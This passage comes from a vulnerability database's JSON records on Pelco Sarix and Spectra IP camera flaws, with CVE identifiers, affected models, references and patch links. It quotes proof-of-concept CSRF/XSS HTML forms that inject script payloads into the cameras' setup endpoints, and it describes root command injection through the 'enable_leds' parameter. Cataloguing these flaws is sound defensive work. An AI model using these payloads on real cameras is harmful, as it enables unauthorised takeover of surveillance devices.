name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16260",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"id": "VAR-201905-1051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
}
]
},
"last_update_date": "2023-12-18T12:18:59.212000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Cross-Site Request Forgery Vulnerability (CNVD-2019-16260)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/162755"
},
{
"title": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92888"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7827"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T20:29:01.277000",
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"date": "2020-02-10T21:48:03.727000",
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
],
"trust": 0.6
}
}
VAR-201905-1041
Vulnerability from variot - Updated: 2023-12-18 12:18An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Contains a vulnerability in improper neutralization of special elements of data query logic.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. Security vulnerabilities exist in SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1041",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6230l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe31",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6220l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "d6230l",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "ime119-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1i",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "imes19-1p",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
